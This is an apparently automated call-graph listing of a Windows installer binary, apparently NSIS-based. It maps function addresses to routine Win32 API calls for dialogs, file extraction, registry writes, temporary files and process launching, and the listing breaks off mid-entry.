3876->3912 3882 404b08 3877->3882 3880 404ba0 3885 40694b 5 API calls 3880->3885 3881 404a68 3884 40694b 5 API calls 3881->3884 3883 404b3f SetDlgItemTextW 3882->3883 3886 406594 21 API calls 3882->3886 3883->3857 3884->3856 3892 404ba7 3885->3892 3887 404b27 lstrcmpiW 3886->3887 3887->3883 3889 404b38 lstrcatW 3887->3889 3888 404be8 3915 406557 lstrcpynW 3888->3915 3889->3883 3891 404bef 3893 405ed1 4 API calls 3891->3893 3892->3888 3897 405e72 2 API calls 3892->3897 3898 404c40 3892->3898 3894 404bf5 GetDiskFreeSpaceW 3893->3894 3896 404c19 MulDiv 3894->3896 3894->3898 3896->3898 3897->3892 3899 404cb1 3898->3899 3901 404e4c 24 API calls 3898->3901 3900 404cd4 3899->3900 3903 40140b 2 API calls 3899->3903 3916 4044f8 KiUserCallbackDispatcher 3900->3916 3902 404c9e 3901->3902 3904 404cb3 SetDlgItemTextW 3902->3904 3905 404ca3 3902->3905 3903->3900 3904->3899 3907 404d83 24 API calls 3905->3907 3907->3899 3908 404cf0 3908->3909 3917 404920 3908->3917 3909->3862 3911->3858 3912->3881 3913->3866 3914->3880 3915->3891 3916->3908 3918 404933 SendMessageW 3917->3918 3919 40492e 3917->3919 3918->3909 3919->3918 3920 401c48 3921 402d89 21 API calls 3920->3921 3922 401c4f 3921->3922 3923 402d89 21 API calls 3922->3923 3924 401c5c 3923->3924 3925 401c71 3924->3925 3926 402dab 21 API calls 3924->3926 3927 402dab 21 API calls 3925->3927 3931 401c81 3925->3931 3926->3925 3927->3931 3928 401cd8 3930 402dab 21 API calls 3928->3930 3929 401c8c 3932 402d89 21 API calls 3929->3932 3933 401cdd 3930->3933 3931->3928 3931->3929 3934 401c91 3932->3934 3935 402dab 21 API calls 3933->3935 3936 402d89 21 API calls 3934->3936 3938 401ce6 FindWindowExW 3935->3938 3937 401c9d 3936->3937 3939 401cc8 SendMessageW 3937->3939 3940 401caa SendMessageTimeoutW 3937->3940 3941 401d08 3938->3941 3939->3941 3940->3941 3942 4028c9 3943 4028cf 3942->3943 3944 4028d7 FindClose 3943->3944 3945 402c2f 3943->3945 3944->3945 3949 405550 3950 405560 3949->3950 3951 405574 3949->3951 3953 405566 3950->3953 3954 4055bd 3950->3954 3952 40557c IsWindowVisible 3951->3952 3960 405593 3951->3960 3952->3954 3956 405589 3952->3956 3955 404522 SendMessageW 3953->3955 3957 4055c2 CallWindowProcW 3954->3957 3958 405570 3955->3958 3959 404e91 5 API calls 3956->3959 3957->3958 3959->3960 3960->3957 3961 404f11 4 API calls 3960->3961 3961->3954 3962 4016d1 3963 402dab 21 API calls 3962->3963 3964 4016d7 GetFullPathNameW 3963->3964 3965 4016f1 3964->3965 3971 401713 3964->3971 3968 4068b4 2 API calls 3965->3968 3965->3971 3966 401728 GetShortPathNameW 3967 402c2f 3966->3967 3969 401703 3968->3969 3969->3971 3972 406557 lstrcpynW 3969->3972 3971->3966 3971->3967 3972->3971 3973 401e53 GetDC 3974 402d89 21 API calls 3973->3974 3975 401e65 GetDeviceCaps MulDiv ReleaseDC 3974->3975 3976 402d89 21 API calls 3975->3976 3977 401e96 3976->3977 3978 406594 21 API calls 3977->3978 3979 401ed3 CreateFontIndirectW 3978->3979 3980 40263d 3979->3980 3981 402955 3982 402dab 21 API calls 3981->3982 3983 402961 3982->3983 3984 402977 3983->3984 3985 402dab 21 API calls 3983->3985 3986 406022 2 API calls 3984->3986 3985->3984 3987 40297d 3986->3987 4009 406047 GetFileAttributesW CreateFileW 3987->4009 3989 40298a 3990 402a40 3989->3990 3993 4029a5 GlobalAlloc 3989->3993 3994 402a28 3989->3994 3991 402a47 DeleteFileW 3990->3991 3992 402a5a 3990->3992 3991->3992 3993->3994 3995 4029be 3993->3995 3996 4032b9 35 API calls 3994->3996 4010 4034ea SetFilePointer 3995->4010 3998 402a35 CloseHandle 3996->3998 3998->3990 3999 4029c4 4000 4034d4 ReadFile 3999->4000 4001 4029cd GlobalAlloc 4000->4001 4002 402a11 4001->4002 4003 4029dd 4001->4003 4005 4060f9 WriteFile 4002->4005 4004 4032b9 35 API calls 4003->4004 4007 4029ea 4004->4007 4006 402a1d GlobalFree 4005->4006 4006->3994 4008 402a08 GlobalFree 4007->4008 4008->4002 4009->3989 4010->3999 3555 403fd7 3556 404150 3555->3556 3557 403fef 3555->3557 3558 404161 GetDlgItem GetDlgItem 3556->3558 3561 4041a1 3556->3561 3557->3556 3559 403ffb 3557->3559 3560 4044d6 22 API calls 3558->3560 3562 404006 SetWindowPos 3559->3562 3563 404019 3559->3563 3564 40418b SetClassLongW 3560->3564 3565 4041fb 3561->3565 3574 401389 2 API calls 3561->3574 3562->3563 3567 404022 ShowWindow 3563->3567 3568 404064 3563->3568 3571 40140b 2 API calls 3564->3571 3566 404522 SendMessageW 3565->3566 3575 40414b 3565->3575 3597 40420d 3566->3597 3569 404042 GetWindowLongW 3567->3569 3570 40413d 3567->3570 3572 404083 3568->3572 3573 40406c DestroyWindow 3568->3573 3569->3570 3576 40405b ShowWindow 3569->3576 3637 40453d 3570->3637 3571->3561 3578 404088 SetWindowLongW 3572->3578 3579 404099 3572->3579 3577 40445f 3573->3577 3580 4041d3 3574->3580 3576->3568 3577->3575 3586 404490 ShowWindow 3577->3586 3578->3575 3579->3570 3584 4040a5 GetDlgItem 3579->3584 3580->3565 3585 4041d7 SendMessageW 3580->3585 3582 40140b 2 API calls 3582->3597 3583 404461 DestroyWindow EndDialog 3583->3577 3587 4040d3 3584->3587 3588 4040b6 SendMessageW IsWindowEnabled 3584->3588 3585->3575 3586->3575 3590 4040e0 3587->3590 3592 404127 SendMessageW 3587->3592 3593 4040f3 3587->3593 3601 4040d8 3587->3601 3588->3575 3588->3587 3589 406594 21 API calls 3589->3597 3590->3592 3590->3601 3592->3570 3594 404110 3593->3594 3595 4040fb 3593->3595 3599 40140b 2 API calls 3594->3599 3598 40140b 2 API calls 3595->3598 3596 40410e 3596->3570 3597->3575 3597->3582 3597->3583 3597->3589 3600 4044d6 22 API calls 3597->3600 3619 4043a1 DestroyWindow 3597->3619 3628 4044d6 3597->3628 3598->3601 3602 404117 3599->3602 3600->3597 3634 4044af 3601->3634 3602->3570 3602->3601 3604 404288 GetDlgItem 3605 4042a5 ShowWindow KiUserCallbackDispatcher 3604->3605 3606 40429d 3604->3606 3631 4044f8 KiUserCallbackDispatcher 3605->3631 3606->3605 3608 4042cf EnableWindow 3613 4042e3 3608->3613 3609 4042e8 GetSystemMenu EnableMenuItem SendMessageW 3610 404318 SendMessageW 3609->3610 3609->3613 3610->3613 3612 403fb8 22 API calls 3612->3613 3613->3609 3613->3612 3632 40450b SendMessageW 3613->3632 3633 406557 lstrcpynW 3613->3633 3615 404347 lstrlenW 3616 406594 21 API calls 3615->3616 3617 40435d SetWindowTextW 3616->3617 3618 401389 2 API calls 3617->3618 3618->3597 3619->3577 3620 4043bb CreateDialogParamW 3619->3620 3620->3577 3621 4043ee 3620->3621 3622 4044d6 22 API calls 3621->3622 3623 4043f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3622->3623 3624 401389 2 API calls 3623->3624 3625 40443f 3624->3625 3625->3575 3626 404447 ShowWindow 3625->3626 3627 404522 SendMessageW 3626->3627 3627->3577 3629 406594 21 API calls 3628->3629 3630 4044e1 SetDlgItemTextW 3629->3630 3630->3604 3631->3608 3632->3613 3633->3615 3635 4044b6 3634->3635 3636 4044bc SendMessageW 3634->3636 3635->3636 3636->3596 3638 404555 GetWindowLongW 3637->3638 3648 404600 3637->3648 3639 40456a 3638->3639 3638->3648 3640 404597 GetSysColor 3639->3640 3641 40459a 3639->3641 3639->3648 3640->3641 3642 4045a0 SetTextColor 3641->3642 3643 4045aa SetBkMode 3641->3643 3642->3643 3644 4045c2 GetSysColor 3643->3644 3645 4045c8 3643->3645 3644->3645 3646 4045d9 3645->3646 3647 4045cf SetBkColor 3645->3647 3646->3648 3649 4045f3 CreateBrushIndirect 3646->3649 3650 4045ec DeleteObject 3646->3650 3647->3646 3648->3575 3649->3648 3650->3649 4011 4014d7 4012 402d89 21 API calls 4011->4012 4013 4014dd Sleep 4012->4013 4015 402c2f 4013->4015 4016 40195b 4017 402dab 21 API calls 4016->4017 4018 401962 lstrlenW 4017->4018 4019 40263d 4018->4019 3712 4020dd 3713 4021a1 3712->3713 3714 4020ef 3712->3714 3716 401423 28 API calls 3713->3716 3715 402dab 21 API calls 3714->3715 3717 4020f6 3715->3717 3723 4022fb 3716->3723 3718 402dab 21 API calls 3717->3718 3719 4020ff 3718->3719 3720 402115 LoadLibraryExW 3719->3720 3721 402107 GetModuleHandleW 3719->3721 3720->3713 3722 402126 3720->3722 3721->3720 3721->3722 3732 4069ba 3722->3732 3726 402170 3728 4055dc 28 API calls 3726->3728 3727 402137 3729 402147 3727->3729 3730 401423 28 API calls 3727->3730 3728->3729 3729->3723 3731 402193 FreeLibrary 3729->3731 3730->3729 3731->3723 3737 406579 WideCharToMultiByte 3732->3737 3734 4069d7 3735 402131 3734->3735 3736 4069de GetProcAddress 3734->3736 3735->3726 3735->3727 3736->3735 3737->3734 4020 402b5e 4021 402bb0 4020->4021 4022 402b65 4020->4022 4023 40694b 5 API calls 4021->4023 4025 402d89 21 API calls 4022->4025 4028 402bae 4022->4028 4024 402bb7 4023->4024 4026 402dab 21 API calls 4024->4026 4027 402b73 4025->4027 4029 402bc0 4026->4029 4030 402d89 21 API calls 4027->4030 4029->4028 4031 402bc4 IIDFromString 4029->4031 4034 402b7f 4030->4034 4031->4028 4032 402bd3 4031->4032 4032->4028 4038 406557 lstrcpynW 4032->4038 4037 40649e wsprintfW 4034->4037 4035 402bf0 CoTaskMemFree 4035->4028 4037->4028 4038->4035 2937 401761 2943 402dab 2937->2943 2941 40176f 2942 406076 2 API calls 2941->2942 2942->2941 2944 402db7 2943->2944 2953 406594 2944->2953 2947 401768 2949 406076 2947->2949 2950 406083 GetTickCount GetTempFileNameW 2949->2950 2951 4060bd 2950->2951 2952 4060b9 2950->2952 2951->2941 2952->2950 2952->2951 2968 40659f 2953->2968 2954 4067e6 2955 402dd8 2954->2955 2992 406557 lstrcpynW 2954->2992 2955->2947 2970 406805 2955->2970 2957 4067b7 lstrlenW 2957->2968 2959 4066b0 GetSystemDirectoryW 2959->2968 2960 406594 15 API calls 2960->2957 2963 4066c6 GetWindowsDirectoryW 2963->2968 2964 406594 15 API calls 2964->2968 2965 406758 lstrcatW 2965->2968 2966 406805 5 API calls 2966->2968 2968->2954 2968->2957 2968->2959 2968->2960 2968->2963 2968->2964 2968->2965 2968->2966 2969 406728 SHGetPathFromIDListW CoTaskMemFree 2968->2969 2979 406425 2968->2979 2984 40694b GetModuleHandleA 2968->2984 2990 40649e wsprintfW 2968->2990 2991 406557 lstrcpynW 2968->2991 2969->2968 2976 406812 2970->2976 2971 40688d CharPrevW 2972 406888 2971->2972 2972->2971 2974 4068ae 2972->2974 2973 40687b CharNextW 2973->2972 2973->2976 2974->2947 2976->2972 2976->2973 2977 406867 CharNextW 2976->2977 2978 406876 CharNextW 2976->2978 3000 405e53 2976->3000 2977->2976 2978->2973 2993 4063c4 2979->2993 2982 406489 2982->2968 2983 406459 RegQueryValueExW RegCloseKey 2983->2982 2985 406971 GetProcAddress 2984->2985 2986 406967 2984->2986 2987 406980 2985->2987 2997 4068db GetSystemDirectoryW 2986->2997 2987->2968 2989 40696d 2989->2985 2989->2987 2990->2968 2991->2968 2992->2955 2994 4063d3 2993->2994 2995 4063d7 2994->2995 2996 4063dc RegOpenKeyExW 2994->2996 2995->2982 2995->2983 2996->2995 2998 4068fd wsprintfW LoadLibraryExW 2997->2998 2998->2989 3001 405e59 3000->3001 3002 405e6f 3001->3002 3003 405e60 CharNextW 3001->3003 3002->2976 3003->3001 4039 401d62 4040 402d89 21 API calls 4039->4040 4041 401d73 SetWindowLongW 4040->4041 4042 402c2f 4041->4042 3004 401ee3 3012 402d89 3004->3012 3006 401ee9 3007 402d89 21 API calls 3006->3007 3008 401ef5 3007->3008 3009 401f01 ShowWindow 3008->3009 3010 401f0c EnableWindow 3008->3010 3011 402c2f 3009->3011 3010->3011 3013 406594 21 API calls 3012->3013 3014 402d9e 3013->3014 3014->3006 4043 4028e3 4044 4028eb 4043->4044 4045 4028ef FindNextFileW 4044->4045 4047 402901 4044->4047 4046 402948 4045->4046 4045->4047 4049 406557 lstrcpynW 4046->4049 4049->4047 4050 403be7 4051 403bf2 4050->4051 4052 403bf6 4051->4052 4053 403bf9 GlobalAlloc 4051->4053 4053->4052 4054 401568 4055 402ba9 4054->4055 4058 40649e wsprintfW 4055->4058 4057 402bae 4058->4057 4059 40196d 4060 402d89 21 API calls 4059->4060 4061 401974 4060->4061 4062 402d89 21 API calls 4061->4062 4063 401981 4062->4063 4064 402dab 21 API calls 4063->4064 4065 401998 lstrlenW 4064->4065 4067 4019a9 4065->4067 4066 4019ea 4067->4066 4071 406557 lstrcpynW 4067->4071 4069 4019da 4069->4066 4070 4019df lstrlenW 4069->4070 4070->4066 4071->4069 4072 40166f 4073 402dab 21 API calls 4072->4073 4074 401675 4073->4074 4075 4068b4 2 API calls 4074->4075 4076 40167b 4075->4076 4077 402af0 4078 402d89 21 API calls 4077->4078 4079 402af6 4078->4079 4080 406594 21 API calls 4079->4080 4081 402933 4079->4081 4080->4081 4082 4026f1 4083 402d89 21 API calls 4082->4083 4085 402700 4083->4085 4084 40274a ReadFile 4084->4085 4094 40283d 4084->4094 4085->4084 4086 4060ca ReadFile 4085->4086 4087 406128 5 API calls 4085->4087 4088 40278a MultiByteToWideChar 4085->4088 4089 40283f 4085->4089 4091 4027b0 SetFilePointer MultiByteToWideChar 4085->4091 4092 402850 4085->4092 4085->4094 4086->4085 4087->4085 4088->4085 4095 40649e wsprintfW 4089->4095 4091->4085 4093 402871 SetFilePointer 4092->4093 4092->4094 4093->4094 4095->4094 3514 401774 3515 402dab 21 API calls 3514->3515 3516 40177b 3515->3516 3517 4017a3 3516->3517 3518 40179b 3516->3518 3554 406557 lstrcpynW 3517->3554 3553 406557 lstrcpynW 3518->3553 3521 4017a1 3525 406805 5 API calls 3521->3525 3522 4017ae 3523 405e26 3 API calls 3522->3523 3524 4017b4 lstrcatW 3523->3524 3524->3521 3535 4017c0 3525->3535 3526 4068b4 2 API calls 3526->3535 3527 406022 2 API calls 3527->3535 3529 4017d2 CompareFileTime 3529->3535 3530 401892 3531 4055dc 28 API calls 3530->3531 3533 40189c 3531->3533 3532 4055dc 28 API calls 3534 40187e 3532->3534 3536 4032b9 35 API calls 3533->3536 3535->3526 3535->3527 3535->3529 3535->3530 3539 406594 21 API calls 3535->3539 3544 406557 lstrcpynW 3535->3544 3549 405bb7 MessageBoxIndirectW 3535->3549 3550 401869 3535->3550 3552 406047 GetFileAttributesW CreateFileW 3535->3552 3537 4018af 3536->3537 3538 4018c3 SetFileTime 3537->3538 3540 4018d5 CloseHandle 3537->3540 3538->3540 3539->3535 3540->3534 3541 4018e6 3540->3541 3542 4018eb 3541->3542 3543 4018fe 3541->3543 3545 406594 21 API calls 3542->3545 3546 406594 21 API calls 3543->3546 3544->3535 3547 4018f3 lstrcatW 3545->3547 3548 401906 3546->3548 3547->3548 3551 405bb7 MessageBoxIndirectW 3548->3551 3549->3535 3550->3532 3550->3534 3551->3534 3552->3535 3553->3521 3554->3522 4096 4014f5 SetForegroundWindow 4097 402c2f 4096->4097 4098 401a77 4099 402d89 21 API calls 4098->4099 4100 401a80 4099->4100 4101 402d89 21 API calls 4100->4101 4102 401a25 4101->4102 3651 401578 3652 401591 3651->3652 3653 401588 ShowWindow 3651->3653 3654 402c2f 3652->3654 3655 40159f ShowWindow 3652->3655 3653->3652 3655->3654 3656 4023f9 3657 402dab 21 API calls 3656->3657 3658 402408 3657->3658 3659 402dab 21 API calls 3658->3659 3660 402411 3659->3660 3661 402dab 21 API calls 3660->3661 3662 40241b GetPrivateProfileStringW 3661->3662 4103 401ffb 4104 402dab 21 API calls 4103->4104 4105 402002 4104->4105 4106 4068b4 2 API calls 4105->4106 4107 402008 4106->4107 4109 402019 4107->4109 4110 40649e wsprintfW 4107->4110 4110->4109 4111 401b7c 4112 402dab 21 API calls 4111->4112 4113 401b83 4112->4113 4114 402d89 21 API calls 4113->4114 4115 401b8c wsprintfW 4114->4115 4116 402c2f 4115->4116 4117 401000 4118 401037 BeginPaint GetClientRect 4117->4118 4119 40100c DefWindowProcW 4117->4119 4121 4010f3 4118->4121 4124 401179 4119->4124 4122 401073 CreateBrushIndirect FillRect DeleteObject 4121->4122 4123 4010fc 4121->4123 4122->4121 4125 401102 CreateFontIndirectW 4123->4125 4126 401167 EndPaint 4123->4126 4125->4126 4127 401112 6 API calls 4125->4127 4126->4124 4127->4126 4128 404980 4129 404990 4128->4129 4130 4049b6 4128->4130 4132 4044d6 22 API calls 4129->4132 4131 40453d 8 API calls 4130->4131 4133 4049c2 4131->4133 4134 40499d SetDlgItemTextW 4132->4134 4134->4130 4135 401680 4136 402dab 21 API calls 4135->4136 4137 401687 4136->4137 4138 402dab 21 API calls 4137->4138 4139 401690 4138->4139 4140 402dab 21 API calls 4139->4140 4141 401699 MoveFileW 4140->4141 4142 4016a5 4141->4142 4143 4016ac 4141->4143 4144 401423 28 API calls 4142->4144 4145 4068b4 2 API calls 4143->4145 4147 4022fb 4143->4147 4144->4147 4146 4016bb 4145->4146 4146->4147 4148 406317 40 API calls 4146->4148 4148->4142 4149 401503 4150 401508 4149->4150 4152 401520 4149->4152 4151 402d89 21 API calls 4150->4151 4151->4152 4153 401a04 4154 402dab 21 API calls 4153->4154 4155 401a0b 4154->4155 4156 402dab 21 API calls 4155->4156 4157 401a14 4156->4157 4158 401a1b lstrcmpiW 4157->4158 4159 401a2d lstrcmpW 4157->4159 4160 401a21 4158->4160 4159->4160 4161 402304 4162 402dab 21 API calls 4161->4162 4163 40230a 4162->4163 4164 402dab 21 API calls 4163->4164 4165 402313 4164->4165 4166 402dab 21 API calls 4165->4166 4167 40231c 4166->4167 4168 4068b4 2 API calls 4167->4168 4169 402325 4168->4169 4170 402336 lstrlenW lstrlenW 4169->4170 4171 402329 4169->4171 4173 4055dc 28 API calls 4170->4173 4172 4055dc 28 API calls 4171->4172 4175 402331 4171->4175 4172->4175 4174 402374 SHFileOperationW 4173->4174 4174->4171 4174->4175 4176 401d86 4177 401d99 GetDlgItem 4176->4177 4178 401d8c 4176->4178 4180 401d93 4177->4180 4179 402d89 21 API calls 4178->4179 4179->4180 4181 401dda GetClientRect LoadImageW SendMessageW 4180->4181 4182 402dab 21 API calls 4180->4182 4184 401e38 4181->4184 4186 401e44 4181->4186 4182->4181 4185 401e3d DeleteObject 4184->4185 4184->4186 4185->4186 4187 402388 4188 40238f 4187->4188 4192 4023a2 4187->4192 4189 406594 21 API calls 4188->4189 4190 40239c 4189->4190 4191 405bb7 MessageBoxIndirectW 4190->4191 4191->4192 4193 402c0a SendMessageW 4194 402c24 InvalidateRect 4193->4194 4195 402c2f 4193->4195 4194->4195 4196 40460c lstrcpynW lstrlenW 4197 40248f 4198 402dab 21 API calls 4197->4198 4199 4024a1 4198->4199 4200 402dab 21 API calls 4199->4200 4201 4024ab 4200->4201 4214 402e3b 4201->4214 4204 4024e3 4206 4024ef 4204->4206 4208 402d89 21 API calls 4204->4208 4205 402933 4209 40250e RegSetValueExW 4206->4209 4211 4032b9 35 API calls 4206->4211 4207 402dab 21 API calls 4210 4024d9 lstrlenW 4207->4210 4208->4206 4212 402524 RegCloseKey 4209->4212 4210->4204 4211->4209 4212->4205 4215 402e56 4214->4215 4218 4063f2 4215->4218 4219 406401 4218->4219 4220 4024bb 4219->4220 4221 40640c RegCreateKeyExW 4219->4221 4220->4204 4220->4205 4220->4207 4221->4220 4222 402910 4223 402dab 21 API calls 4222->4223 4224 402917 FindFirstFileW 4223->4224 4225 40293f 4224->4225 4229 40292a 4224->4229 4230 40649e wsprintfW 4225->4230 4227 402948 4231 406557 lstrcpynW 4227->4231 4230->4227 4231->4229 4232 401911 4233 401948 4232->4233 4234 402dab 21 API calls 4233->4234 4235 40194d 4234->4235 4236 405c63 71 API calls 4235->4236 4237 401956 4236->4237 4238 401491 4239 4055dc 28 API calls 4238->4239 4240 401498 4239->4240 4241 401914 4242 402dab 21 API calls 4241->4242 4243 40191b 4242->4243 4244 405bb7 MessageBoxIndirectW 4243->4244 4245 401924 4244->4245 4246 404695 4247 4046ad 4246->4247 4253 4047c7 4246->4253 4254 4044d6 22 API calls 4247->4254 4248 404831 4249 4048fb 4248->4249 4250 40483b GetDlgItem 4248->4250 4255 40453d 8 API calls 4249->4255 4251 404855 4250->4251 4252 4048bc 4250->4252 4251->4252 4258 40487b SendMessageW LoadCursorW SetCursor 4251->4258 4252->4249 4259 4048ce 4252->4259 4253->4248 4253->4249 4256 404802 GetDlgItem SendMessageW 4253->4256 4257 404714 4254->4257 4269 4048f6 4255->4269 4279 4044f8 KiUserCallbackDispatcher 4256->4279 4261 4044d6 22 API calls 4257->4261 4280 404944 4258->4280 4264 4048e4 4259->4264 4265 4048d4 SendMessageW 4259->4265 4262 404721 CheckDlgButton 4261->4262 4277 4044f8 KiUserCallbackDispatcher 4262->4277 4264->4269 4270 4048ea SendMessageW 4264->4270 4265->4264 4266 40482c 4271 404920 SendMessageW 4266->4271 4270->4269 4271->4248 4272 40473f GetDlgItem 4278 40450b SendMessageW 4272->4278 4274 404755 SendMessageW 4275 404772 GetSysColor 4274->4275 4276 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4274->4276 4275->4276 4276->4269 4277->4272 4278->4274 4279->4266 4283 405b7d ShellExecuteExW 4280->4283 4282 4048aa LoadCursorW SetCursor 4282->4252 4283->4282 4284 402896 4285 40289d 4284->4285 4291 402bae 4284->4291 4286 402d89 21 API calls 4285->4286 4287 4028a4 4286->4287 4288 4028b3 SetFilePointer 4287->4288 4289 4028c3 4288->4289 4288->4291 4292 40649e wsprintfW 4289->4292 4292->4291 4293 401f17 4294 402dab 21 API calls 4293->4294 4295 401f1d 4294->4295 4296 402dab 21 API calls 4295->4296 4297 401f26 4296->4297 4298 402dab 21 API calls 4297->4298 4299 401f2f 4298->4299 4300 402dab 21 API calls 4299->4300 4301 401f38 4300->4301 4302 401423 28 API calls 4301->4302 4303 401f3f 4302->4303 4310 405b7d ShellExecuteExW 4303->4310 4305 401f87 4306 402933 4305->4306 4307 4069f6 5 API calls 4305->4307 4308 401fa4 CloseHandle 4307->4308 4308->4306 4310->4305 4311 402f98 4312 402fc3 4311->4312 4313 402faa SetTimer 4311->4313 4314 403018 4312->4314 4315 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4312->4315 4313->4312 4315->4314 3663 40571b 3664 4058c5 3663->3664 3665 40573c GetDlgItem GetDlgItem GetDlgItem 3663->3665 3667 4058f6 3664->3667 3668 4058ce GetDlgItem CreateThread CloseHandle 3664->3668 3708 40450b SendMessageW 3665->3708 3670 405921 3667->3670 3672 405946 3667->3672 3673 40590d ShowWindow ShowWindow 3667->3673 3668->3667 3711 4056af 5 API calls 3668->3711 3669 4057ac 3678 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3669->3678 3671 405981 3670->3671 3675 405935 3670->3675 3676 40595b ShowWindow 3670->3676 3671->3672 3685 40598f SendMessageW 3671->3685 3677 40453d 8 API calls 3672->3677 3710 40450b SendMessageW 3673->3710 3679 4044af SendMessageW 3675->3679 3681 40597b 3676->3681 3682 40596d 3676->3682 3680 405954 3677->3680 3683 405821 3678->3683 3684 405805 SendMessageW SendMessageW 3678->3684 3679->3672 3690 4044af SendMessageW 3681->3690 3689 4055dc 28 API calls 3682->3689 3686 405834 3683->3686 3687 405826 SendMessageW 3683->3687 3684->3683 3685->3680 3688 4059a8 CreatePopupMenu 3685->3688 3692 4044d6 22 API calls 3686->3692 3687->3686 3691 406594 21 API calls 3688->3691 3689->3681 3690->3671 3693 4059b8 AppendMenuW 3691->3693 3694 405844 3692->3694 3695 4059d5 GetWindowRect 3693->3695 3696 4059e8 TrackPopupMenu 3693->3696 3697 405881 GetDlgItem SendMessageW 3694->3697 3698 40584d ShowWindow 3694->3698 3695->3696 3696->3680 3699 405a03 3696->3699 3697->3680 3702 4058a8 SendMessageW SendMessageW 3697->3702 3700 405870 3698->3700 3701 405863 ShowWindow 3698->3701 3703 405a1f SendMessageW 3699->3703 3709 40450b SendMessageW 3700->3709 3701->3700 3702->3680 3703->3703 3704 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3703->3704 3706 405a61 SendMessageW 3704->3706 3706->3706 3707 405a8a GlobalUnlock SetClipboardData CloseClipboard 3706->3707 3707->3680 3708->3669 3709->3697 3710->3670 4316 401d1c 4317 402d89 21 API calls 4316->4317 4318 401d22 IsWindow 4317->4318 4319 401a25 4318->4319 4320 404d1d 4321 404d49 4320->4321 4322 404d2d 4320->4322 4323 404d7c 4321->4323 4324 404d4f SHGetPathFromIDListW 4321->4324 4331 405b9b GetDlgItemTextW 4322->4331 4326 404d5f 4324->4326 4330 404d66 SendMessageW 4324->4330 4328 40140b 2 API calls 4326->4328 4327 404d3a SendMessageW 4327->4321 4328->4330 4330->4323 4331->4327 4332 40149e 4333 4023a2 4332->4333 4334 4014ac PostQuitMessage 4332->4334 4334->4333 4335 401ba0 4336 401bf1 4335->4336 4341 401bad 4335->4341 4337 401bf6 4336->4337 4338 401c1b GlobalAlloc 4336->4338 4344 4023a2 4337->4344 4356 406557 lstrcpynW 4337->4356 4339 406594 21 API calls 4338->4339 4345 401c36 4339->4345 4340 406594 21 API calls 4346 40239c 4340->4346 4342 401bc4 4341->4342 4341->4345 4354 406557 lstrcpynW 4342->4354 4345->4340 4345->4344 4350 405bb7 MessageBoxIndirectW 4346->4350 4348 401c08 GlobalFree 4348->4344 4349 401bd3 4355 406557 lstrcpynW 4349->4355 4350->4344 4352 401be2 4357 406557 lstrcpynW 4352->4357 4354->4349 4355->4352 4356->4348 4357->4344 4358 402621 4359 402dab 21 API calls 4358->4359 4360 402628 4359->4360 4363 406047 GetFileAttributesW CreateFileW 4360->4363 4362 402634 4363->4362 4364 4025a3 4365 402deb 21 API calls 4364->4365 4366 4025ad 4365->4366 4367 402d89 21 API calls 4366->4367 4368 4025b6 4367->4368 4369 4025d2 RegEnumKeyW 4368->4369 4370 4025de RegEnumValueW 4368->4370 4371 402933 4368->4371 4372 4025f3 RegCloseKey 4369->4372 4370->4372 4372->4371 3190 4015a8 3191 402dab 21 API calls 3190->3191 3192 4015af SetFileAttributesW 3191->3192 3193 4015c1 3192->3193 3194 401fa9 3195 402dab 21 API calls 3194->3195 3196 401faf 3195->3196 3197 4055dc 28 API calls 3196->3197 3198 401fb9 3197->3198 3209 405b3a CreateProcessW 3198->3209 3203 402933 3204 401fd4 3205 401fe4 3204->3205 3206 401fd9 3204->3206 3207 401fe2 CloseHandle 3205->3207 3217 40649e wsprintfW 3206->3217 3207->3203 3210 401fbf 3209->3210 3211 405b6d CloseHandle 3209->3211 3210->3203 3210->3207 3212 4069f6 WaitForSingleObject 3210->3212 3211->3210 3213 406a10 3212->3213 3214 406a22 GetExitCodeProcess 3213->3214 3218 406987 3213->3218 3214->3204 3217->3207 3219 4069a4 PeekMessageW 3218->3219 3220 4069b4 WaitForSingleObject 3219->3220 3221 40699a DispatchMessageW 3219->3221 3220->3213 3221->3219 3222 40252f 3233 402deb 3222->3233 3225 402dab 21 API calls 3226 402542 3225->3226 3227 40254d RegQueryValueExW 3226->3227 3232 402933 3226->3232 3228 402573 RegCloseKey 3227->3228 3229 40256d 3227->3229 3228->3232 3229->3228 3238 40649e wsprintfW 3229->3238 3234 402dab 21 API calls 3233->3234 3235 402e02 3234->3235 3236 4063c4 RegOpenKeyExW 3235->3236 3237 402539 3236->3237 3237->3225 3238->3228 4374 40202f 4375 402dab 21 API calls 4374->4375 4376 402036 4375->4376 4377 40694b 5 API calls 4376->4377 4378 402045 4377->4378 4379 402061 GlobalAlloc 4378->4379 4382 4020d1 4378->4382 4380 402075 4379->4380 4379->4382 4381 40694b 5 API calls 4380->4381 4383 40207c 4381->4383 4384 40694b 5 API calls 4383->4384 4385 402086 4384->4385 4385->4382 4389 40649e wsprintfW 4385->4389 4387 4020bf 4390 40649e wsprintfW 4387->4390 4389->4387 4390->4382 4391 4021af 4392 402dab 21 API calls 4391->4392 4393 4021b6 4392->4393 4394 402dab 21 API calls 4393->4394 4395 4021c0 4394->4395 4396 402dab 21 API calls 4395->4396 4397 4021ca 4396->4397 4398 402dab 21 API calls 4397->4398 4399 4021d4 4398->4399 4400 402dab 21 API calls 4399->4400 4401 4021de 4400->4401 4402 40221d CoCreateInstance 4401->4402 4403 402dab 21 API calls 4401->4403 4404 40223c 4402->4404 4403->4402 4405 401423 28 API calls 4404->4405 4406 4022fb 4404->4406 4405->4406 3239 403532 SetErrorMode GetVersionExW 3240 403586 GetVersionExW 3239->3240 3241 4035be 3239->3241 3240->3241 3242 403615 3241->3242 3243 40694b 5 API calls 3241->3243 3244 4068db 3 API calls 3242->3244 3243->3242 3245 40362b lstrlenA 3244->3245 3245->3242 3246 40363b 3245->3246 3247 40694b 5 API calls 3246->3247 3248 403642 3247->3248 3249 40694b 5 API calls 3248->3249 3250 403649 3249->3250 3251 40694b 5 API calls 3250->3251 3255 403655 #17 OleInitialize SHGetFileInfoW 3251->3255 3254 4036a4 GetCommandLineW 3328 406557 lstrcpynW 3254->3328 3327 406557 lstrcpynW 3255->3327 3257 4036b6 3258 405e53 CharNextW 3257->3258 3259 4036dc CharNextW 3258->3259 3267 4036ee 3259->3267 3260 4037f0 3261 403804 GetTempPathW 3260->3261 3329 403501 3261->3329 3263 